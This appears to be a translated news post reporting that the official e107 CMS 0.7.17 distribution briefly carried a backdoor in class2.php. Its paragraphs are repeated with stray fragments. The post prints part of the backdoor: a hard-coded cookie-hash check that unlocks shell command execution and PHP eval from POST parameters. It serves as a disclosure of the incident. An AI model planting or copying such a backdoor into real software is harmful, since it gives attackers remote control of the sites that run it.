Unsecure Update E107
On January 22, the official site of the content management system received news from McFly that a very unpleasant exploit was discovered, which affects the entire 0.7.xx branch, including the current, at that time, version 0.7.16.
In its news, McFly requested to urgently upgrade to version 0.7.17, and also report it to everyone who uses this CMS.
And on January 25, all users of e107 were waiting for a new surprise, in the form of a backdoor in the class2.php file, or to be more precise:
')
The changes appear to have been made only in the class2.php of the full CMS distribution, which is located on the official E107 website, and were not seen in the updates that are located on the sourceforge site.
At the moment, when I try to download the archive with the full distribution kit e107 0.7.17, 404 are output from the official site
In its news, McFly requested to urgently upgrade to version 0.7.17, and also report it to everyone who uses this CMS.
And on January 25, all users of e107 were waiting for a new surprise, in the form of a backdoor in the class2.php file, or to be more precise:
file: class2.php, line: 1876
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
...
if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}
elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}
...
')
The changes appear to have been made only in the class2.php of the full CMS distribution, which is located on the official E107 website, and were not seen in the updates that are located on the sourceforge site.
At the moment, when I try to download the archive with the full distribution kit e107 0.7.17, 404 are output from the official site
Source: https://habr.com/ru/post/82059/
All Articles